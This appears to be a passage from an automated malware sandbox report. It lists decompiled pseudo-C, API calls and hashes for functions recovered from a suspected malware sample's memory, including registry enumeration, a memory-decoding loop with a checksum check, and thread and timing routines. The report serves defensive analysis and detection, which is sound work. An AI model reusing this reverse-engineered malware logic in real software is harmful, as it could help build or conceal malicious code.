                                                            • Instruction Fuzzy Hash: 7C41F6B0901219EFDF209FE5D9849AEBBB9EB04345F24446BE902E6350E7319E44DB35
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD56E3, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SysAllocString.OLEAUT32(80000002), ref: 00DD573A
                                                            • SysAllocString.OLEAUT32(00DD5BA8), ref: 00DD577D
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD5791
                                                            • SysFreeString.OLEAUT32(00000000), ref: 00DD579F
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: String$AllocFree
                                                            • String ID:
                                                            • API String ID: 344208780-0
                                                            • Opcode ID: 3f283654bfdaa20e896d833e2d028efd4bd9d2beb68e8f54e10798a5e6b25e71
                                                            • Instruction ID: c5a14932d333ed25cfb1dccd64d8e5f307ea9ada82058f0c13567b8e6a52e55e
                                                            • Opcode Fuzzy Hash: 3f283654bfdaa20e896d833e2d028efd4bd9d2beb68e8f54e10798a5e6b25e71
                                                            • Instruction Fuzzy Hash: 0731F875900609EF8B05DF98E8C48AEBBB9FF48340B24842FE50A97350E7359A45CFB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD4560, Relevance: 6.1, APIs: 4, Instructions: 98registrysynchronizationCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD4560(void* __ecx, intOrPtr _a4) {
				int* _v8;
				int _v12;
				int* _v16;
				int _v20;
				int* _v24;
				char* _v28;
				void* _v32;
				long _t33;
				char* _t35;
				long _t39;
				long _t42;
				intOrPtr _t47;
				void* _t51;
				long _t53;

				_t51 = __ecx;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_t33 = RegOpenKeyExA(0x80000003, 0, 0, 0x20019,  &_v32); // executed
				_t53 = _t33;
				if(_t53 != 0) {
					L18:
					return _t53;
				}
				_t53 = 8;
				_t35 = E00DD77D7(0x104);
				_v28 = _t35;
				if(_t35 == 0) {
					L17:
					RegCloseKey(_v32);
					goto L18;
				}
				_v20 = 0x104;
				do {
					_v16 = _v20;
					_v12 = 0x104;
					_t39 = RegEnumKeyExA(_v32, _v8, _v28,  &_v12, 0, 0, 0, 0); // executed
					_t53 = _t39;
					if(_t53 != 0xea) {
						if(_t53 != 0) {
							L14:
							if(_t53 == 0x103) {
								_t53 = 0;
							}
							L16:
							E00DD77EC(_v28);
							goto L17;
						}
						_t42 = E00DD5AFA(_t51, _v32, _v28, _v24, _v12,  &_v8, _a4); // executed
						_t53 = _t42;
						if(_t53 != 0) {
							goto L14;
						}
						goto L12;
					}
					if(_v12 <= 0x104) {
						if(_v16 <= _v20) {
							goto L16;
						}
						E00DD77EC(_v24);
						_v20 = _v16;
						_t47 = E00DD77D7(_v16);
						_v24 = _t47;
						if(_t47 != 0) {
							L6:
							_t53 = 0;
							goto L12;
						}
						_t53 = 8;
						goto L16;
					}
					_v8 = _v8 + 1;
					goto L6;
					L12:
				} while (WaitForSingleObject( *0xdda2c4, 0) == 0x102);
				goto L16;
			}

















                                                            0x00dd4560
                                                            0x00dd457a
                                                            0x00dd457d
                                                            0x00dd4580
                                                            0x00dd4583
                                                            0x00dd4586
                                                            0x00dd458c
                                                            0x00dd4590
                                                            0x00dd466a
                                                            0x00dd466e
                                                            0x00dd466e
                                                            0x00dd4599
                                                            0x00dd45a0
                                                            0x00dd45a7
                                                            0x00dd45aa
                                                            0x00dd465f
                                                            0x00dd4662
                                                            0x00000000
                                                            0x00dd4668
                                                            0x00dd45b0
                                                            0x00dd45b3
                                                            0x00dd45ba
                                                            0x00dd45c4
                                                            0x00dd45cd
                                                            0x00dd45d3
                                                            0x00dd45db
                                                            0x00dd4613
                                                            0x00dd464d
                                                            0x00dd4653
                                                            0x00dd4655
                                                            0x00dd4655
                                                            0x00dd4657
                                                            0x00dd465a
                                                            0x00000000
                                                            0x00dd465a
                                                            0x00dd4628
                                                            0x00dd462d
                                                            0x00dd4631
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd4631
                                                            0x00dd45e0
                                                            0x00dd45ef
                                                            0x00000000
                                                            0x00000000
                                                            0x00dd45f4
                                                            0x00dd45fd
                                                            0x00dd4600
                                                            0x00dd4607
                                                            0x00dd460a
                                                            0x00dd45e5
                                                            0x00dd45e5
                                                            0x00000000
                                                            0x00dd45e5
                                                            0x00dd460e
                                                            0x00000000
                                                            0x00dd460e
                                                            0x00dd45e2
                                                            0x00000000
                                                            0x00dd4633
                                                            0x00dd4640
                                                            0x00000000

                                                            APIs
                                                            • RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00DD17B3,?), ref: 00DD4586
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • RegEnumKeyExA.KERNELBASE(?,?,?,00DD17B3,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00DD17B3), ref: 00DD45CD
                                                            • WaitForSingleObject.KERNEL32(00000000,?,?,?,00DD17B3,?,00DD17B3,?,?,?,?,?,00DD17B3,?), ref: 00DD463A
                                                            • RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00DD17B3,?,?,?,?,?,00DD6E29,?), ref: 00DD4662
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: AllocateCloseEnumHeapObjectOpenSingleWait
                                                            • String ID:
                                                            • API String ID: 3664505660-0
                                                            • Opcode ID: 0fc7e6bc9dd70f7791d343e4dce53fbf76cb56a3190bd4bed61c53904f00aada
                                                            • Instruction ID: e13d6d94655959c6dabc418cdfeebb7e46086e67379ab5b29b1b09022b4ea31e
                                                            • Opcode Fuzzy Hash: 0fc7e6bc9dd70f7791d343e4dce53fbf76cb56a3190bd4bed61c53904f00aada
                                                            • Instruction Fuzzy Hash: 9A311875C00219EBCF21AFA9DC859EEFFB9EB95310F144067E562B2260D2718E50DBB1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B18A0, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96memoryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 86%
                                                            			E6E4B18A0(void* __edi, intOrPtr _a4) {
				signed int _v8;
				intOrPtr _v12;
				unsigned int _v16;
				intOrPtr _v20;
				char _v24;
				void* _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				void* _v40;
				signed int _v48;
				signed int _v52;
				intOrPtr _t46;
				void* _t53;
				intOrPtr _t54;
				intOrPtr _t57;
				signed int _t66;
				intOrPtr _t68;
				intOrPtr _t83;
				void* _t84;

				_t83 =  *0x6e4b41b0;
				_t46 = E6E4B1C00(_t83,  &_v24,  &_v16);
				_v20 = _t46;
				if(_t46 == 0) {
					asm("sbb ebx, ebx");
					_t66 =  ~( ~(_v16 & 0x00000fff)) + (_v16 >> 0xc);
					_t84 = _t83 + _v24;
					_v40 = _t84;
					_t53 = VirtualAlloc(0, _t66 << 0xc, 0x3000, 4); // executed
					_v28 = _t53;
					if(_t53 == 0) {
						_v20 = 8;
					} else {
						_v8 = _v8 & 0x00000000;
						if(_t66 <= 0) {
							_t54 =  *0x6e4b41cc;
						} else {
							_t68 = _a4;
							_t57 = _t53 - _t84;
							_t13 = _t68 + 0x6e4b5137; // 0x6e4b5137
							_v32 = _t57;
							_v36 = _t57 + _t13;
							_v12 = _t84;
							while(1) {
								asm("movsd");
								asm("movsd");
								asm("movsd");
								E6E4B116D(_v12 + _t57, _v12, (_v52 ^ _v48) - _v8 + _v24 + _a4 - 1, 0x400);
								_v12 = _v12 + 0x1000;
								_t54 =  *((intOrPtr*)(_v36 + 0xc)) -  *((intOrPtr*)(_v36 + 8)) +  *((intOrPtr*)(_v36 + 4));
								_v8 = _v8 + 1;
								 *0x6e4b41cc = _t54;
								if(_v8 >= _t66) {
									break;
								}
								_t57 = _v32;
							}
						}
						if(_t54 != 0x69b25f44) {
							_v20 = 9;
						} else {
							memcpy(_v40, _v28, _v16);
						}
						VirtualFree(_v28, 0, 0x8000); // executed
					}
				}
				return _v20;
			}






















                                                            0x6e4b18a7
                                                            0x6e4b18b7
                                                            0x6e4b18be
                                                            0x6e4b18c1
                                                            0x6e4b18d6
                                                            0x6e4b18dd
                                                            0x6e4b18e2
                                                            0x6e4b18f3
                                                            0x6e4b18f6
                                                            0x6e4b18fe
                                                            0x6e4b1901
                                                            0x6e4b19b4
                                                            0x6e4b1907
                                                            0x6e4b1907
                                                            0x6e4b190d
                                                            0x6e4b197c
                                                            0x6e4b190f
                                                            0x6e4b190f
                                                            0x6e4b1912
                                                            0x6e4b1914
                                                            0x6e4b191c
                                                            0x6e4b191f
                                                            0x6e4b1922
                                                            0x6e4b192a
                                                            0x6e4b1935
                                                            0x6e4b1936
                                                            0x6e4b1937
                                                            0x6e4b1954
                                                            0x6e4b1962
                                                            0x6e4b1969
                                                            0x6e4b196c
                                                            0x6e4b1972
                                                            0x6e4b1977
                                                            0x00000000
                                                            0x00000000
                                                            0x6e4b1927
                                                            0x6e4b1927
                                                            0x6e4b1979
                                                            0x6e4b1986
                                                            0x6e4b199b
                                                            0x6e4b1988
                                                            0x6e4b1991
                                                            0x6e4b1996
                                                            0x6e4b19ac
                                                            0x6e4b19ac
                                                            0x6e4b19bb
                                                            0x6e4b19c1

                                                            APIs
                                                            • VirtualAlloc.KERNELBASE(00000000,6E4B1A70,00003000,00000004,?,?,6E4B1A70,00000001), ref: 6E4B18F6
                                                            • memcpy.NTDLL(?,?,6E4B1A70,?,?,6E4B1A70,00000001), ref: 6E4B1991
                                                            • VirtualFree.KERNELBASE(?,00000000,00008000,?,?,6E4B1A70,00000001), ref: 6E4B19AC
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Virtual$AllocFreememcpy
                                                            • String ID: Sep 20 2021
                                                            • API String ID: 4010158826-2355132765
                                                            • Opcode ID: 1fc53ced827f22c971cbebc2d29e3cbd98533e2dd047f4e1f6e59b20473b0aa7
                                                            • Instruction ID: debdd4d92c4862c0e1f9f10a5b811b2dd8b46e83e87ed80a08c83434ea008124
                                                            • Opcode Fuzzy Hash: 1fc53ced827f22c971cbebc2d29e3cbd98533e2dd047f4e1f6e59b20473b0aa7
                                                            • Instruction Fuzzy Hash: B0310E71D00219AFDB00DFE9D884FEEB7B9FF15344F104169E915A7241D7B1AA06CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD1723, Relevance: 6.1, APIs: 4, Instructions: 87sleepCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 41%
                                                            			E00DD1723(void* __ecx, void* __eflags, intOrPtr _a4, signed int* _a8, intOrPtr _a12) {
				intOrPtr _v12;
				void* _v16;
				void* _v28;
				char _v32;
				void* __esi;
				void* _t20;
				void* _t26;
				void* _t29;
				void* _t38;
				signed int* _t39;
				void* _t40;

				_t36 = __ecx;
				_v32 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v12 = _a4;
				_t20 = E00DD5909(__ecx,  &_v32); // executed
				_t38 = _t20;
				if(_t38 != 0) {
					L12:
					_t39 = _a8;
					L13:
					if(_t39 != 0 && ( *_t39 & 0x00000001) == 0) {
						_t23 =  &(_t39[1]);
						if(_t39[1] != 0) {
							E00DD3910(_t23);
						}
					}
					return _t38;
				}
				_t26 = E00DD1FBC(0x40,  &_v16); // executed
				if(_t26 != 0) {
					_v16 = 0;
				}
				_t40 = CreateEventA(0xdda2f8, 1, 0,  *0xdda394);
				if(_t40 != 0) {
					SetEvent(_t40);
					Sleep(0xbb8); // executed
					CloseHandle(_t40);
				}
				_push( &_v32);
				if(_a12 == 0) {
					_t29 = E00DD4560(_t36); // executed
				} else {
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_t29 = E00DD5AFA(_t36);
				}
				_t41 = _v16;
				_t38 = _t29;
				if(_v16 != 0) {
					E00DD44B9(_t41);
				}
				if(_t38 != 0) {
					goto L12;
				} else {
					_t39 = _a8;
					_t38 = E00DD43C6( &_v32, _t39);
					goto L13;
				}
			}














                                                            0x00dd1723
                                                            0x00dd1730
                                                            0x00dd1736
                                                            0x00dd1737
                                                            0x00dd1738
                                                            0x00dd1739
                                                            0x00dd173a
                                                            0x00dd173e
                                                            0x00dd1745
                                                            0x00dd174a
                                                            0x00dd174e
                                                            0x00dd17d6
                                                            0x00dd17d6
                                                            0x00dd17d9
                                                            0x00dd17db
                                                            0x00dd17e3
                                                            0x00dd17e9
                                                            0x00dd17ec
                                                            0x00dd17ec
                                                            0x00dd17e9
                                                            0x00dd17f7
                                                            0x00dd17f7
                                                            0x00dd175a
                                                            0x00dd1761
                                                            0x00dd1763
                                                            0x00dd1763
                                                            0x00dd177a
                                                            0x00dd177e
                                                            0x00dd1781
                                                            0x00dd178c
                                                            0x00dd1793
                                                            0x00dd1793
                                                            0x00dd179f
                                                            0x00dd17a0
                                                            0x00dd17ae
                                                            0x00dd17a2
                                                            0x00dd17a2
                                                            0x00dd17a3
                                                            0x00dd17a4
                                                            0x00dd17a5
                                                            0x00dd17a6
                                                            0x00dd17a7
                                                            0x00dd17a7
                                                            0x00dd17b3
                                                            0x00dd17b8
                                                            0x00dd17ba
                                                            0x00dd17bc
                                                            0x00dd17bc
                                                            0x00dd17c3
                                                            0x00000000
                                                            0x00dd17c5
                                                            0x00dd17c5
                                                            0x00dd17d2
                                                            0x00000000
                                                            0x00dd17d2

                                                            APIs
                                                            • CreateEventA.KERNEL32(00DDA2F8,00000001,00000000,00000040,?,?,73BCF710,00000000,73BCF730,?,?,?,?,00DD6E29,?,00000001), ref: 00DD1774
                                                            • SetEvent.KERNEL32(00000000,?,?,?,?,00DD6E29,?,00000001,00DD5FE7,00000002,?,?,00DD5FE7), ref: 00DD1781
                                                            • Sleep.KERNELBASE(00000BB8,?,?,?,?,00DD6E29,?,00000001,00DD5FE7,00000002,?,?,00DD5FE7), ref: 00DD178C
                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00DD6E29,?,00000001,00DD5FE7,00000002,?,?,00DD5FE7), ref: 00DD1793
                                                              • Part of subcall function 00DD4560: RegOpenKeyExA.KERNELBASE(80000003,00000000,00000000,00020019,?,00000000,00000000,?,?,?,?,?,00DD17B3,?), ref: 00DD4586
                                                              • Part of subcall function 00DD4560: RegEnumKeyExA.KERNELBASE(?,?,?,00DD17B3,00000000,00000000,00000000,00000000,00000104,00000000,?,?,?,?,?,00DD17B3), ref: 00DD45CD
                                                              • Part of subcall function 00DD4560: WaitForSingleObject.KERNEL32(00000000,?,?,?,00DD17B3,?,00DD17B3,?,?,?,?,?,00DD17B3,?), ref: 00DD463A
                                                              • Part of subcall function 00DD4560: RegCloseKey.ADVAPI32(?,00000104,00000000,?,?,?,?,?,00DD17B3,?,?,?,?,?,00DD6E29,?), ref: 00DD4662
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: CloseEvent$CreateEnumHandleObjectOpenSingleSleepWait
                                                            • String ID:
                                                            • API String ID: 891522397-0
                                                            • Opcode ID: 3fde4bd25a97ce9200662c47f9257ec77b23916c9019e16bb2df7d2cac91420f
                                                            • Instruction ID: 936bc8378f1942143da7ad8246c8f9a7486c7350a62e5c6d8926e427cb2d61d1
                                                            • Opcode Fuzzy Hash: 3fde4bd25a97ce9200662c47f9257ec77b23916c9019e16bb2df7d2cac91420f
                                                            • Instruction Fuzzy Hash: 2721837A900219FBCB10AFE9D8819EEB3B9EB44350B154527FA11E7310D7759D448BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD15D7, Relevance: 6.1, APIs: 4, Instructions: 80registryCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD15D7(int _a4, int _a8, void* _a12, short* _a16, char** _a20, intOrPtr* _a24) {
				long _t26;
				intOrPtr* _t38;
				char* _t42;
				long _t43;

				if(_a4 == 0) {
					L2:
					_t26 = RegOpenKeyW(_a8, _a12,  &_a12); // executed
					_t43 = _t26;
					if(_t43 == 0) {
						RegQueryValueExW(_a12, _a16, 0,  &_a8, 0,  &_a4); // executed
						if(_a4 == 0) {
							_t43 = 0xe8;
						} else {
							_t42 = E00DD77D7(_a4);
							if(_t42 == 0) {
								_t43 = 8;
							} else {
								_t43 = RegQueryValueExW(_a12, _a16, 0,  &_a8, _t42,  &_a4);
								if(_t43 != 0) {
									E00DD77EC(_t42);
								} else {
									 *_a20 = _t42;
									_t38 = _a24;
									if(_t38 != 0) {
										 *_t38 = _a4;
									}
								}
							}
						}
						RegCloseKey(_a12);
					}
					L12:
					return _t43;
				}
				_t43 = E00DD3F0E(_a4, _a8, _a12, _a16, _a20, _a24);
				if(_t43 == 0) {
					goto L12;
				}
				goto L2;
			}







                                                            0x00dd15e3
                                                            0x00dd1606
                                                            0x00dd1610
                                                            0x00dd1616
                                                            0x00dd161a
                                                            0x00dd1632
                                                            0x00dd1637
                                                            0x00dd167f
                                                            0x00dd1639
                                                            0x00dd1641
                                                            0x00dd1645
                                                            0x00dd167c
                                                            0x00dd1647
                                                            0x00dd1659
                                                            0x00dd165d
                                                            0x00dd1673
                                                            0x00dd165f
                                                            0x00dd1662
                                                            0x00dd1664
                                                            0x00dd1669
                                                            0x00dd166e
                                                            0x00dd166e
                                                            0x00dd1669
                                                            0x00dd165d
                                                            0x00dd1645
                                                            0x00dd1687
                                                            0x00dd1687
                                                            0x00dd168e
                                                            0x00dd1694
                                                            0x00dd1694
                                                            0x00dd15fc
                                                            0x00dd1600
                                                            0x00000000
                                                            0x00000000
                                                            0x00000000

                                                            APIs
                                                            • RegOpenKeyW.ADVAPI32(80000002,039C9DF4,039C9DF4), ref: 00DD1610
                                                            • RegQueryValueExW.KERNELBASE(039C9DF4,?,00000000,80000002,00000000,00000000,?,00DD5BD9,3D00DD90,80000002,00DD17B3,00000000,00DD17B3,?,039C9DF4,80000002), ref: 00DD1632
                                                            • RegQueryValueExW.ADVAPI32(039C9DF4,?,00000000,80000002,00000000,00000000,00000000,?,00DD5BD9,3D00DD90,80000002,00DD17B3,00000000,00DD17B3,?,039C9DF4), ref: 00DD1657
                                                            • RegCloseKey.ADVAPI32(039C9DF4,?,00DD5BD9,3D00DD90,80000002,00DD17B3,00000000,00DD17B3,?,039C9DF4,80000002,00000000,?), ref: 00DD1687
                                                              • Part of subcall function 00DD3F0E: SafeArrayDestroy.OLEAUT32(00000000), ref: 00DD3F93
                                                              • Part of subcall function 00DD77EC: RtlFreeHeap.NTDLL(00000000,00000000,00DD1333,00000000,00000000,?,00000000,?,?,?,?,?,00DD66B0,00000000,?,00000001), ref: 00DD77F8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: QueryValue$ArrayCloseDestroyFreeHeapOpenSafe
                                                            • String ID:
                                                            • API String ID: 486277218-0
                                                            • Opcode ID: 55338c11bdead840d70969fcb670777222f2204a172104785f01397502580d50
                                                            • Instruction ID: 3755e45ad627d75576db1c968a73c528f465ac55a21609437a955d3e482b5146
                                                            • Opcode Fuzzy Hash: 55338c11bdead840d70969fcb670777222f2204a172104785f01397502580d50
                                                            • Instruction Fuzzy Hash: F321F57A40015EBFCF11AF94DC80CEA7BA9EB18390B098527FE1597260D632DD64DBB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0457DAC2, Relevance: 6.1, APIs: 4, Instructions: 64memoryregistryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RegQueryValueExA.KERNELBASE(045722F6,?,00000000,045722F6,00000000,04572306,045722F6,?,?,?,?,0457ABF7,80000001,?,045722F6,04572306), ref: 0457DAE7
                                                            • RtlAllocateHeap.NTDLL(00000000,04572306,00000000), ref: 0457DAFE
                                                            • HeapFree.KERNEL32(00000000,00000000,?,0457ABF7,80000001,?,045722F6,04572306,?,0457AB63,80000001,?,045722F6), ref: 0457DB19
                                                            • RegQueryValueExA.KERNELBASE(045722F6,?,00000000,045722F6,00000000,04572306,?,0457ABF7,80000001,?,045722F6,04572306,?,0457AB63,80000001), ref: 0457DB38
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: HeapQueryValue$AllocateFree
                                                            • String ID:
                                                            • API String ID: 4267586637-0
                                                            • Opcode ID: addab05c389906af868676f07cb025d065792e1780b31c55759d9175a8ec8382
                                                            • Instruction ID: 2d1351105f9fd9ee69f85104d01d76d2f364ef570b371c2f9a67cbe39d6458eb
                                                            • Opcode Fuzzy Hash: addab05c389906af868676f07cb025d065792e1780b31c55759d9175a8ec8382
                                                            • Instruction Fuzzy Hash: 68111FB6500118FFDB12DF95EC84CEEBBBDFB89750B104066F905A6210D671AE44EF60
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456C5E7, Relevance: 6.0, APIs: 4, Instructions: 42stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • GetProcessImageFileNameW.PSAPI(?,00000000,00000800,00001000,0458C140,00000000,0456AD03,?,0456D280,?), ref: 0456C606
                                                            • PathFindFileNameW.SHLWAPI(00000000,?,?,00000000,00000800,00001000,0458C140,00000000,0456AD03,?,0456D280,?), ref: 0456C611
                                                            • _wcsupr.NTDLL ref: 0456C61E
                                                            • lstrlenW.KERNEL32(00000000), ref: 0456C626
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: FileName$AllocateFindHeapImagePathProcess_wcsuprlstrlen
                                                            • String ID:
                                                            • API String ID: 2533608484-0
                                                            • Opcode ID: f6561c688790c9e64bd697b6fbb9b55fe531d50f39fa6df9ef3c6238c7aad122
                                                            • Instruction ID: 9a9eb9bb24533da548e4d423d17af55bfe94d170a04fa6f8eeb002c5efa9cd89
                                                            • Opcode Fuzzy Hash: f6561c688790c9e64bd697b6fbb9b55fe531d50f39fa6df9ef3c6238c7aad122
                                                            • Instruction Fuzzy Hash: 88F0B4311011125AA3136B3C6C88A6F666DFF90B65B10953DF843E2140CE59EC05F2A8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0456D17E, Relevance: 6.0, APIs: 4, Instructions: 37threadCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 0456D19D
                                                              • Part of subcall function 045700CA: RtlEnterCriticalSection.NTDLL(00000000), ref: 045700D6
                                                              • Part of subcall function 045700CA: CloseHandle.KERNEL32(?), ref: 045700E4
                                                              • Part of subcall function 045700CA: RtlLeaveCriticalSection.NTDLL(00000000), ref: 04570100
                                                            • CloseHandle.KERNEL32(?), ref: 0456D1AB
                                                            • InterlockedDecrement.KERNEL32(0458BFFC), ref: 0456D1BA
                                                              • Part of subcall function 04583A70: SetEvent.KERNEL32(000003BC,0456D1D5), ref: 04583A7A
                                                              • Part of subcall function 04583A70: CloseHandle.KERNEL32(000003BC), ref: 04583A8F
                                                              • Part of subcall function 04583A70: HeapDestroy.KERNELBASE(045C0000), ref: 04583A9F
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 0456D1D6
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: CloseHandle$CriticalSection$DecrementDestroyEnterEventExitHeapInterlockedLeaveMultipleObjectsThreadUserWait
                                                            • String ID:
                                                            • API String ID: 1141245775-0
                                                            • Opcode ID: 45fff90680b88b981e1413c993e3a7b254a237574c634bf3d557f92dd838ef23
                                                            • Instruction ID: 6ba533145639c92101ac05513628bff361d87e819996eed0c48aa68abbcc99ce
                                                            • Opcode Fuzzy Hash: 45fff90680b88b981e1413c993e3a7b254a237574c634bf3d557f92dd838ef23
                                                            • Instruction Fuzzy Hash: EFF06830601604AFD7016F689C49F6A3B79FB46734F10065CF516B72C0DFB8AD05AB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 6E4B1FC9, Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 87%
                                                            			E6E4B1FC9(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6E4B1A1C(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4); // executed
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}







                                                            0x6e4b1fd2
                                                            0x6e4b1fd7
                                                            0x6e4b1fe5
                                                            0x6e4b1fea
                                                            0x6e4b1fea
                                                            0x6e4b1ff0
                                                            0x6e4b1ff5
                                                            0x6e4b1ff9
                                                            0x6e4b1ffd
                                                            0x6e4b1ffd
                                                            0x6e4b2007
                                                            0x6e4b2010

                                                            APIs
                                                            • GetCurrentThread.KERNEL32 ref: 6E4B1FCC
                                                            • SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6E4B1FD7
                                                            • SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6E4B1FEA
                                                            • SetThreadPriority.KERNELBASE(00000000,00000000,?), ref: 6E4B1FFD
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1185181412.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true
                                                            • Associated: 00000000.00000002.1185112968.000000006E4B0000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185264812.000000006E4B3000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185310564.000000006E4B5000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1185336391.000000006E4B6000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: Thread$Priority$AffinityCurrentMask
                                                            • String ID:
                                                            • API String ID: 1452675757-0
                                                            • Opcode ID: 1dec30c0ea0fae77c6ccb024b6e6a78b2fb0e00f209847812bf30681e9bfbe88
                                                            • Instruction ID: e6eccbac5df728967c726e3ac836287631e9de076b3f9661f5ea8924fcbf0cfa
                                                            • Opcode Fuzzy Hash: 1dec30c0ea0fae77c6ccb024b6e6a78b2fb0e00f209847812bf30681e9bfbe88
                                                            • Instruction Fuzzy Hash: 87E09231609A116B97017ABE5C88F6B775CEF933307020636F520D23D4DBB49C1685B5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04575A47, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54memorytimeCOMMON
                                                            Download Yara Rule
                                                            APIs
